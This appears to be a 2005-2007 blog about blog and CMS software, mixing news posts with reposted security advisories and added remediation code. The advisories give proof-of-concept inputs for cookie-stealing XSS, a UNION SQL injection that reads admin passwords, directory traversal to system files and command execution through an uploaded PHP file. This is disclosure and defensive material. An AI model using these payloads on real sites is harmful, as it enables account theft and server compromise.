Monday, February 26, 2007


XSS in b2Evolution

b2evolution is "a free blog tool for the next generation of blogs". A cross site scripting vulnerability in b2Evolution's login page allows attackers to insert arbitrary HTML and/or JavaScript into the login page.

Vulnerable versions: 0.9.1, 1.6-alpha, 1.8.6, 1.9.1-beta

alert(document.cookie) <--- in 1 string.

Monday, July 10, 2006


PluggedOut Blog SQL INJECTION and XSS


PluggedOut Blog is an open source script you can run on your web server to give you an online multi-user journal or diary. It can be used equally well for any kind of calendar application. Rather than give you a thousand things you don't really want ...
PluggedOut Blog :

The information has been provided by Hamid Ebadi (Hamid Network Security Team):
The original article can be found at:

Vulnerable Systems:
PluggedOut Blog Version : Version: 1.9.9c (2006-01-13)

example :
The following URL can be used to trigger an SQL injection vulnerability in the exec.php:
http://[PluggedOut Blog]/exec.php?action=comment_add&entryid=[SQL INJECTION]

and XSS
http://[PluggedOut Blog]/problem.php?id=1&data=>script<alert
('Hamid Network Security Team -->');alert(document.cookie)>/script<


Acidcat ASP CMS Multiple Vulnerabilities

Acidcat CMS is a web site and simple content management system that can be administered via a web browser.
It is free for non-commercial use. Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities allowing a remote attacker to find administrator username and password.
Acidcat ASP CMS :

The information has been provided by Hamid Ebadi (Hamid Network Security Team)
The original article can be found at:

Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page: http://localhost/acidcat/default.asp?ID=1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16

Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";

The following URL illustrates how easily the administrator username and password can be read:

http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
The base path of the login is :

Database Download:
The database can be downloaded over the web (default installation). It can be found at http://localhost/acidcat/databases/acidcat.mdb
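The main_content.asp line quoted above doubles single quotes but places the value in a numeric context, so a request that contains no quote at all passes through unchanged. The following is an added example, not code from Acidcat CMS: `buildVulnerableQuery` mirrors the quoted line, while `buildSafeQuery`, the `?` placeholder form and the sample list are assumptions made for illustration.

```javascript
// Added illustration; only buildVulnerableQuery mirrors the page's line.
// Same construction as main_content.asp: quotes are doubled, but the value
// lands in a numeric context where no quote is needed to change the query.
function buildVulnerableQuery(id) {
  return "SELECT * FROM Item WHERE ID = " + id.replace(/'/g, "''");
}

// Hypothetical hardened form: accept only a canonical positive integer and
// pass it as a bound parameter instead of concatenating it.
function buildSafeQuery(raw) {
  if (typeof raw !== "string" || !/^[1-9][0-9]{0,8}$/.test(raw)) {
    return null; // caller should answer with "not found"
  }
  return { text: "SELECT * FROM Item WHERE ID = ?", params: [Number(raw)] };
}

// Inputs taken from the requests quoted in this post, plus one normal ID.
const SAMPLE_IDS = [
  "26",
  "1'",
  "26 union select 1,username,3,password,5,6 from Configuration",
];

// For each input, report the SQL the original code would build, whether the
// quote doubling changed the input at all, and whether the validator accepts it.
function audit(ids) {
  return ids.map((id) => ({
    id,
    vulnerableSql: buildVulnerableQuery(id),
    escapingChangedInput: id.replace(/'/g, "''") !== id,
    accepted: buildSafeQuery(id) !== null,
  }));
}

for (const row of audit(SAMPLE_IDS)) {
  console.log(row.accepted ? "ACCEPT" : "REJECT", JSON.stringify(row.vulnerableSql));
}
```

The second sample reproduces the `ID = 1''` expression seen in the ODBC error message, and the third shows that the escaping leaves the UNION request byte-for-byte intact.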

Sunday, March 06, 2005


PHP include in phpWebSite



Anyone who has permission to add announcements can upload a PHP script as a .gif file and execute it.


http://[target]/images/announce/[anyname].gif.php?nst=ls –la

Where [anyname].gif.php - php-script with this line:


Vulnerable Systems:

phpWebSite <= 0.10.0

Official Website: phpWebSite
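The `[anyname].gif.php` upload described above succeeds because the client-supplied name, with its trailing `.php`, is what ends up on disk. The following upload check is an added example, not phpWebSite code; the function name, the GIF-only policy and the `announce-<id>.gif` storage scheme are assumptions.

```javascript
// Added illustration; names and storage scheme are hypothetical.
const GIF_MAGIC = ["GIF87a", "GIF89a"];

// Decide whether an announcement image upload may be stored, and under what
// server-chosen name. `bytes` is the uploaded content as an array of byte values.
function checkAnnounceUpload(filename, bytes, announceId) {
  const parts = filename.toLowerCase().split(".");
  // Exactly one dot: "x.gif.php" and "x.php.gif" are both refused, because
  // either may be executed depending on how the web server maps extensions.
  if (parts.length !== 2 || !/^[a-z0-9_-]+$/.test(parts[0])) {
    return { ok: false, reason: "bad-name" };
  }
  if (parts[1] !== "gif") return { ok: false, reason: "bad-extension" };
  // The content must at least start with a GIF signature.
  const magic = String.fromCharCode(...bytes.slice(0, 6));
  if (!GIF_MAGIC.includes(magic)) return { ok: false, reason: "not-a-gif" };
  // Never reuse the client's name on disk.
  return { ok: true, storedName: `announce-${announceId}.gif` };
}

// Helper for the constructed samples below.
const toBytes = (s) => Array.from(s, (c) => c.charCodeAt(0));

// Constructed sample uploads (not taken from a real system).
const SAMPLES = [
  ["pic.gif.php", toBytes("GIF89a<?php ?>")],
  ["pic.php", toBytes("<?php ?>")],
  ["pic.gif", toBytes("<?php ?>")],
  ["pic.gif", toBytes("GIF89a\x01\x00\x01\x00")],
];

for (const [name, bytes] of SAMPLES) {
  console.log(name, JSON.stringify(checkAnnounceUpload(name, bytes, 7)));
}
```

The signature check alone does not stop a GIF that carries script text; the server-chosen `.gif` name, together with an upload directory where script execution is disabled, is what keeps the file from being executed.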


Multiple Vulnerabilities in PHP-Nuke (db.php, index.php, Downloads, Web_Links)


PHP-Nuke is "a popular open source content management system, written in PHP by Francisco Burzi. This CMS is used on many thousands websites, because it's freeware, easy to install and manage and has broad set of features". Multiple vulnerabilities were found in PHP-Nuke that result in Path Disclosure and Cross Site Scripting.


The information has been provided by Janek Vind. The original article can be found at:


Vulnerable Systems:

* PHP-Nuke version 6.0 up to version 7.6

Path Disclosure


There are several path disclosures in PHP-Nuke when any of the following sample URLs is accessed:





Cross Site Scripting

There are two parameters in the modules.php file that are vulnerable to Cross Site Scripting attacks:

In newdownloadshowdays

In newlinkshowdays

Friday, January 14, 2005


Interview with Lee Eason

The PostNuke official website published an interview with Lee Eason, a member of the pnCore team who is responsible for the development of the module SDK.

He said some interesting things, for example that PostNuke's greatest weakness is also its greatest strength: the modular nature of the system. Lee is also the author and director of pnFlashGames and He also said that pnFlashGames has a weakness too: "Well, the weakest part of my module is the pnHTML I think"

So read the interview :-)

Thursday, January 13, 2005


New Microsoft CMS Book Released

Microsoft released ‘Building Websites with Microsoft Content Management Server’.

The book presumes a working knowledge of the .NET Framework and familiarity with the C# language, but no prior knowledge of MCMS is required.

The following topics are covered in detail:

The basic concepts of MCMS
Preparing, installing and configuring MCMS and its supporting technologies
Creating an MCMS website from scratch
Creating and debugging templates files and channel rendering scripts

Working with dynamic navigation
Establishing user roles and rights
Authoring with MCMS and improving the authoring experience
Understanding and customizing workflow
Working with the Publishing API
Site deployment techniques
Enhancing your site's performance with caching



Tuesday, January 11, 2005


Angelinecms 0.7 screenshots

Here are some screenshots from the future version of angelinecms:

New user manager: shot1, shot2

New group manager: shot1, shot2

Source: Couple 0.7 screenshots


Simple PHP Blog Directory Traversal


Simple PHP Blog requires "no database to create a blog system but instead only requires PHP 4 (or greater) and write permission on the server". Two vulnerabilities in Simple PHP Blog, caused by inadequate checking for directory traversal, allow a remote attacker to view arbitrary files and create arbitrary directories.

Credit: The information has been provided by Madelman.


Vulnerable Systems: * Simple PHP Blog version 0.3.7r1 and prior

Immune Systems: * Simple PHP Blog version 0.3.7r2 or newer

We can read any file with TXT extension (in this example /etc/X11/rgb.txt)

Request: http://[SERVER]/sphpblog/comments.php?y=05&m=01&entry=../../../../../../../etc/X11/rgb

Returns the content of the file

We can create arbitrary folders in the file system and the content of the post will be saved in this folder. To create folder http://[SERVER]/sphpblog/createdir/

Request (this must be a POST request and we must modify the entry parameter): http://[SERVER]/sphpblog/comment_add_cgi.php~ entry=../../../createdir

Source: Securiteam
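Both Simple PHP Blog requests above work because the `entry` value is joined into a file path without any check on where the result points. The following is an added example, not Simple PHP Blog code: it contrasts that naive join with an allowlist plus containment check, and the content root, the `<yy>/<mm>/<entry>.txt` layout and the valid entry name are assumptions.

```javascript
// Added illustration; the content/<yy>/<mm>/<entry>.txt layout is assumed.
const CONTENT_ROOT = "/var/www/sphpblog/content"; // hypothetical base directory

// Collapse "." and ".." segments the way the filesystem would resolve them.
function normalize(absPath) {
  const out = [];
  for (const seg of absPath.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") out.pop();
    else out.push(seg);
  }
  return "/" + out.join("/");
}

// Naive construction: parameters are concatenated and ".txt" is appended,
// which is why only files with a TXT extension are reachable.
function naiveEntryPath(y, m, entry) {
  return normalize(`${CONTENT_ROOT}/${y}/${m}/${entry}.txt`);
}

// Hardened: allowlist each parameter, then confirm the normalized path is
// still below the content root before it is opened or created.
function safeEntryPath(y, m, entry) {
  if (!/^[0-9]{2}$/.test(y) || !/^(0[1-9]|1[0-2])$/.test(m)) return null;
  if (!/^[A-Za-z0-9_-]{1,64}$/.test(entry)) return null;
  const resolved = normalize(`${CONTENT_ROOT}/${y}/${m}/${entry}.txt`);
  return resolved.startsWith(CONTENT_ROOT + "/") ? resolved : null;
}

// Entry values from the two requests in this post, plus a constructed valid one.
const ENTRIES = [
  "../../../../../../../etc/X11/rgb",
  "../../../createdir",
  "entry050111-120000",
];

for (const e of ENTRIES) {
  console.log(naiveEntryPath("05", "01", e), "->", safeEntryPath("05", "01", e));
}
```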


b2Evolution 'title' SQL Injection

b2evolution is "probably the most comprehensive blog engine you can find". An SQL injection vulnerability has been found in b2evolution's 'title' parameter, allowing a remote attacker to cause the program to include arbitrary SQL statements inside its existing statement.

Credit: The information has been provided by r0ut3r.


Exploit: The following URL will trigger the vulnerability:


1: manual edit:

Open the file /blogs/b2evocore/_class_itemlist.php and find the following code around lines 197-201:


// if a post urltitle is specified, load that post

if( !empty( $title ) ) { $where .= " AND post_urltitle = '$title'"; }

Replace these lines like this:


// if a post urltitle is specified, load that post
if( !empty( $title ) ) { $where .= ' AND post_urltitle = '.$DB->quote($title); }

2: patch files

Download the following file: , unzip it and replace the two enclosed files in the blogs/b2evocore folder. This second method also fixes a small harmless bug that would cause an error when testing whether the SQL injection issue is fixed.

Source (bug) : Securiteam
Source (workaround): b2evolution forums.



The developers of the WordPress blog engine announced a new website, the WordPress Plugin repository. Great news for plugin developers!

Developers can:

Host their development for free
Be assured of high visibility
Manage their code using an SVN client
Track issues (bugs) using the tracker
Provide documentation using the wiki with the help of end-users.

WordPress Users can:

Browse all the plugins and themes.
Download plugins and themes from one location.
Provide feedback to plugin developers using the tracker. Help improve the plugin or theme.
Develop documentation at the wiki page for the plugins they use.
Stay in the loop using the RSS feeds.




BLOG:CMS is the most complete, feature-packed, personal publishing system on the market, developed by Radek Hulán. It includes state-of-the-art weblog, forum, wiki engine, news aggregator (atom / rss), and photo gallery.


An overview of the most important BLOG:CMS features is given below.

Standards compliance
BLOG:CMS is probably the only system that is not only w3c valid, but also ships with application/xhtml+xml MIME type by default, for top performance on modern browsers like Mozilla, Firefox, Safari and Opera. But BLOG:CMS will also automatically supply the older standard, text/html, to browsers which cannot handle this, like obsolete Microsoft Internet Explorer.
Maintenance of one or more weblogs/news-sites
With BLOG:CMS, you can set up one or more weblogs. If you want to, you can even show the contents of multiple weblogs on the same page.

Integrated Forum
With BLOG:CMS, you can host discussions of your articles in either your weblog, or in a forum. This gives you many more possibilities and freedom for larger discussions. BLOG:CMS members are automatically registered in your forum as well, and within your weblog you can see date and time of last forum post for each article.
Integrated Photo Gallery
Today, when digital cameras are more common than traditional ones, a personal presentation without a Photo Gallery could hardly exist. BLOG:CMS ships with Singapore Photo Gallery, using GD2 and/or ImageMagick to create thumbnails.

Wiki engine
A Wiki engine is a great tool for any documentation needs and for collaboration on projects. Anybody can add information to a Wiki resource. Some of the world's biggest knowledge resources are based on Wiki engines. BLOG:CMS comes with the Dokuwiki engine, one of the best, and standards compliant.


You can always download the latest release of BLOG:CMS at Both zip format for Windows users, and tar.gz format for GNU/Linux users are provided.

These releases are currently available:

Release 3.5 - weblog, forum, photo gallery, news, wiki and contact sections (2350 KB): (recommended).

Release 3.4 - weblog and contact sections (1150 KB):

Monday, January 10, 2005



This is my first pilot post!
